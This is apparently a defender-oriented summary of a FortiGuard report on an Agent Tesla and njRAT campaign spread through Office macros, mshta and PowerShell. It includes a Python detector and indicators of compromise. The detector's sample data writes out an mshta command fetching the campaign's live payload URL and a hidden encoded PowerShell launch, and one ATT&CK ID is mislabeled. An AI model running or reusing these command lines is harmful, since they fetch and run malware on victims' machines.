Fortinet FortiGuard Labs analyzed malicious Microsoft Office documents that abused the legitimate sites MediaFire and Blogger to deliver two malware variants: Agent Tesla and njRAT (Bladabindi). The operation uses a multi-stage chain (VBA macros, mshta, and PowerShell with process hollowing) to steal credentials, capture data, and exfiltrate it via FTP.
Key points
- Threat actors delivered two malware families (Agent Tesla and njRAT/Bladabindi) using malicious Office documents whose follow-on stages are fetched from legitimate sites (MediaFire and Blogger).
- Initial access relies on macro-enabled Office documents with Auto_Open triggers to execute the payloads.
- Stage 2 uses mshta to reach a malicious URL on MediaFire and to drop subsequent components.
- Stage 3 employs PowerShell and process hollowing to load the final payloads while encoding/obfuscating code to hinder analysis and bypass AMSI.
- Final payloads include Agent Tesla (credential/data theft with FTP exfiltration) and njRAT (remote control/monitoring with obfuscated code).
- IoCs include multiple SHA-256 hashes, a C2/FTP server, and domain names associated with the campaign; Fortinet provides detections and defender guidance.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – ‘phishing emails and lure office documents are always an efficient way to spread this malware.’
- [T1059.005] Visual Basic – ‘the code is automatically triggered because it uses the “Auto_Open()” function.’
- [T1218.005] Mshta – ‘the mshta process started right after clicking “Enable Macros” in the document.’
- [T1105] Ingress Tool Transfer – ‘to download payloads from the MediaFire site’ and ‘1.htm downloaded from MediaFire’
- [T1027] Obfuscated/Compressed Files and Information – ‘the main malware and part of the code are encoded and replaced with strings to increase the difficulty of analysis.’
- [T1055.012] Process Hollowing – ‘The PowerShell script in “1.txt” delivered its final payload via the process hollowing technique.’
- [T1059.001] PowerShell – ‘PowerShell script… delivers its final payload’ and ‘The PowerShell section… bypasses AMSI’ (see the T1562.001 entry)
- [T1562.001] Impair Defenses – ‘disables logging and bypasses AMSI by patching it.’
- [T1053.005] Scheduled Task – ‘adds persistence by creating a scheduled task.’
- [T1112.001] Modify Registry – ‘it adds to the registry in “HKEY_CURRENT_USER” with name “di” and data “!”.’
- [T1082] System Information Discovery – ‘collects the victim device’s information… and MD5 hash for this data.’
- [T1555.003] Credentials from Web Browsers – ‘Agent Tesla uses a typical application list to steal login credentials, cookies, mail information, and VPN data.’
- [T1041] Exfiltration Over C2 Channel – ‘sends this data via FTP protocol using hardcoded IP.’
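As an added example (not code from the FortiGuard report), a small Python detector for the chain these techniques describe: it walks parent-process lineage over constructed Sysmon-style process-creation events and flags Office-spawned script hosts, mshta launched with a remote URL, encoded PowerShell, and scheduled-task creation from PowerShell. The sample events, task name and encoded string are constructed; only the URL and the NGCwje.exe filename come from the report.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """Process-creation event with Sysmon-like fields; image is the lower-case basename."""
    pid: int
    ppid: int
    image: str
    cmdline: str

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
LOLBINS = {"mshta.exe", "wscript.exe", "cscript.exe", "cmd.exe"} | SHELLS

def lineage(events, pid):
    """Images from pid up to the root (pid itself first); a seen set cuts pid-reuse loops."""
    by_pid = {e.pid: e for e in events}
    seen, out = set(), []
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        out.append(by_pid[pid].image)
        pid = by_pid[pid].ppid
    return out

def findings(events):
    """Return (pid, reason) pairs for events matching a stage of the chain."""
    hits = []
    for e in events:
        anc = set(lineage(events, e.ppid))   # ancestors only, not the event itself
        cmd = e.cmdline.lower()
        if e.image in LOLBINS and anc & OFFICE:  # macro -> script host (T1059.005 -> T1218.005)
            hits.append((e.pid, f"{e.image} descends from an Office process"))
        if e.image == "mshta.exe" and re.search(r"https?://", cmd):  # T1105
            hits.append((e.pid, "mshta launched with a remote URL"))
        if e.image in SHELLS and re.search(r"\s-(e|ec|enc|encodedcommand)\b", cmd):  # T1059.001
            hits.append((e.pid, "encoded PowerShell command line"))
        if e.image == "schtasks.exe" and "/create" in cmd and anc & SHELLS:  # T1053.005
            hits.append((e.pid, "scheduled task created from PowerShell"))
    return hits

# Constructed sample telemetry; only the URL and NGCwje.exe come from the report.
SAMPLE = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "winword.exe", '"WINWORD.EXE" /n invoice.doc'),
    ProcEvent(300, 200, "mshta.exe", "mshta http://www.webclientservices.co.uk/p/1.html"),
    ProcEvent(400, 300, "powershell.exe", "powershell -nop -w hidden -enc SQBFAFgA"),
    ProcEvent(500, 400, "schtasks.exe", "schtasks /create /sc minute /tn CONSTRUCTED /tr NGCwje.exe"),
    ProcEvent(600, 100, "chrome.exe", "chrome.exe"),  # benign control, should produce no hit
]
```

Running `findings(SAMPLE)` yields five hits covering pids 300, 400 and 500 and none for the benign control; real telemetry would also need the registry marker (HKCU value "di" = "!") and FTP traffic to the C2 host correlated alongside these process events.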
Indicators of Compromise
- [Domain] mobnew6565.duckdns.org – C2 domain used for data exfiltration.
- [Domain] www.webclientservices.co.uk – Domain hosting the HTML page used to deliver later-stage scripts and payloads.
- [URL] http://www.webclientservices.co.uk/p/1.html – Page used to host or deliver scripts and payloads.
- [File] NGCwje.exe – Filename used for persistence on the victim machine.
- [File] Windows – Lure filename placed in the startup/Templates directory to appear legitimate.
- [Hash] 9cb3a21f90dbb0dc5f3054a05571d8f2b5c2c06e0d24be4ec3a313cb7a061a60, 63f13715d7c962f7eb36fe4cc7dbdbae1b599133ce2867bb346c11a61fac0990
- [Hash] a44196d6b73d49ed6712df37fabd0e2b11d2bd91458c0351b6c7401e285b8a49, 1844081002dc04a0e236503c233be07d7a0b6024c829fd0620f63075bb6a011a
- [Hash] a0931ce734fcc865c90fa7e9004bea8db551c32c699fdd389213c59cde3832cd, bdb94f7c3a13ea102258540f372d4ae07a4d4943f0ae9324f44fdfa8481bfaf2
- [Hash] 39e67f25b0fa660db0541bf37e315fb4def772bd3b6d67991b64a5a85914477d